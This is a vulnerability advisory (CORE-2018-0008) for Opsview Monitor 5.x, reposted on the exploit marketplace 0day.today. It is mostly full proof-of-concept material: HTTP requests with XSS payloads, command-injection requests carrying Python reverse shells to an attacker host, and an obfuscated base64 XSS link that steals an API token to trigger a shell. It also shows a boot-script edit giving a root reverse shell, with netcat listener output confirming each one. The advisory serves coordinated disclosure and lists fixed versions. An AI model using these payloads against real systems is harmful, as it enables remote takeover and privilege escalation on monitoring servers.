0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Opsview Monitor 5.x Command Execution Vulnerability
Opsview Monitor Multiple Vulnerabilities 1. **Advisory Information** Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release 2. **Vulnerability Information** Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145 3. **Vulnerability Description** Opsview's website states that: Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more. Multiple vulnerabilities were found in the Opsview Monitor, which would allow an attacker with access to the management console to execute commands on the operating system. 4. **Vulnerable Packages** . Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2 Other products and versions might be affected, but they were not tested. 5. **Vendor Information, Solutions and Workarounds** Opsview released the following versions of its product that fix the reported issues. . Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1 In addition, Opsview published the following release notes: . https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new 6. **Credits** These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team. 7. **Technical Description / Proof of Concept Code** Opsview Monitor is a virtual appliance designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to monitor and manage hosts and their services. Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could be abused to execute malicious JavaScript code in the context of a legitimate user. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance. 7.1. **Reflected Cross-Site Scripting in Diagnostics** [CVE-2018-16148] The 'diagnosticsb2ksy' parameter of the '/rest' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability: /----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/ 7.2. **Persistent Cross-Site Scripting in Settings endpoint** [CVE-2018-16147] The 'data' parameter of the '/settings/api/router' endpoint is vulnerable to Cross-Site Scripting. The following proof of concept demonstrates the vulnerability: /----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close [{"action":"SettingsServer","method":"setObjecttypeState","data":["</script><script>alert(4)</script>","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/ The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. However, this vulnerability can be exploited by an attacker to gain persistency and execute the malicious code each time the victim accesses to the settings section. Excerpt of the source code showing the injected script tag: /----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"</script><script>alert(4)</script>":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"<script>alert(4)</script>":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/ 7.3. **Notification abuse leading to remote command execution** [CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges. The following proof of concept executes a reverse shell: /----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close {"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attackerIP>\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell. In order to perform the attack, consider the following: . API's sensitive actions require a 'restToken' to be processed. This token could be obtained by a Cross-Site Scripting attack from a specific endpoint (/settings). . Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login. The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator: /----- https://<serverIP>/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/ Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell. 7.4. **Rancid test connection functionality abuse leading to command execution** [CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter. The following proof of concept executes a reverse shell: /----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: <serverIP> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<serverIP>/settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close ip=<attackerIP>++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'`&host_id=2 -----/ /----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/ 7.5. **Script modification could allow local privilege escalation** [CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges. The following excerpt shows the vulnerable code: /----- /etc/init.d/opsview-reporting-module: /opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi DAEMON=/opt/opsview/jasper/bin/rc.jasperserver test -x $DAEMON || exit 0 # Switch to opsview user if run as root id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/ The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group. /----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/ Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted. The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges: /----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerIP>",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;; esac shift done -----/ /----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [<serverIP>] port 16000 [tcp/*] accepted (family 2, sport 45566) # id uid=0(root) gid=0(root) groups=0(root) -----/ # 0day.today [2024-07-01] #